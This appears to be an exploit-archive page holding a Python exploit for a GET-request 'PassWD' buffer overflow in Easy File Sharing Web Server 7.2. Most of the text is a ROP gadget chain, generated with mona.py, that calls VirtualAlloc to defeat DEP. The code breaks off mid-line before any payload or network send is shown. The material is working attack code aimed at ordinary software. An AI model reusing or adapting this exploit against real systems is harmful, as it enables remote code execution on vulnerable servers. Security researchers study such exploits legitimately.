Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)

Properties

Published:
10.07.2017
Target:
Easy File Sharing Web Server 7.2

Code

#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP)
# Date: 8 July 2017
# Exploit Author: Sungchul Park
# Author Contact: lxmania7@gmail.com
# Vendor Homepage: http://www.sharing-file.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server 7.2
# Tested on: Winows 7 SP1
 
import socket, struct
 
def create_rop_chain():
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        # For EDX -> flAllocationType(0x1000) [ EAX to EBX ]
        # 0x00000000,  # [-] Unable to find gadget to put 00001000 into edx
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0xFFFFEFFF,  # -1001 (static value)
        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
        0x1001614d,  # DEC EAX # RETN [ImageLoad.dll] 
        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
        0x1004de84,  # &Writable location [ImageLoad.dll]
         
        # For EDX -> flAllocationType(0x1000) [ EBX to EDX ]
        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
        0x10022c1e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] 
        0xffffffff,  # Filler (Compensation for POP EBX)
         
        # For ESI -> &VirtualAlloc
        0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
        0xffffffff,  # Filler \
        0xffffffff,  # Filler  |
        0xffffffff,  # Filler  | => (Compensation for RETN 0x10)
        0xffffffff,  # Filler /
        0x1004d1fc,  # ptr to &VirtualAlloc() [IAT ImageLoad.dll]
        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 
        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll] 
        0x1001aeb4,  # POP ESI # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x1001715d,  # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] 
        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 
         
        # For EBP -> Return Address
        0x10013860,  # POP EBP # RETN [ImageLoad.dll] 
        0x61c24169,  # & push esp # ret  [sqlite3.dll]
         
        # For EBX -> dwSize(0x01)
        0x100132ba,  # POP EBX # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x61c2785d,  # INC EBX # ADD AL,83 # RETN [sqlite3.dll] 
        0x1001f6da,  # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] 
                 
        # For ECX -> flProtect(0x40)
        0x10019dfa,  # POP ECX # RETN [ImageLoad.dll] 
        0xffffffff,  #  
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 
        0x61c68081,  # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
        0x61c06831,  # ADD ECX,ECX # RETN [sqlite3.dll]
         
        # For EDI -> ROP NOP
        0x61c373a4,  # POP EDI # RETN [sqlite3.dll] 
        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
        # For EAX -> NOP(0x90)
        0x10015442,  # POP EAX # RETN [ImageLoad.dll] 
        0x90909090,  # nop
        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll] 
    ]
    return ''.join(struct.pack('